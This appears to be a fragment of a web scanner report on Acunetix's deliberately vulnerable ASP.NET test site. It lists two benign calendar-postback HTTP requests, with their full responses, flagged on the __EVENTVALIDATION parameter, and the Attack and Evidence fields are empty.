Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8229&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAALaFiZNoIZGRkFVWY89ND4MWiF4yOEgn1U9D03s8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKl4IKjDwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DvE228Mbxj2e8g%2BkD2HJuY%2FH7XQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:26:46 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgAALaFiZNoIZGRkFVWY89ND4MWiF4yOEgn1U9D03s8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKl4IKjDwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DvE228Mbxj2e8g+kD2HJuY/H7XQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:White" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8187&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCA06thQ9oIZGRkBCP73zd1UZyLQ8PaHZBc06PsgVM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKl5ontAwK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8qKdq4NfWHMmgWYaFLFKDUdEoMvw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:49:11 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCA06thQ9oIZGRkBCP73zd1UZyLQ8PaHZBc06PsgVM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKl5ontAwK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8qKdq4NfWHMmgWYaFLFKDUdEoMvw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:White" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
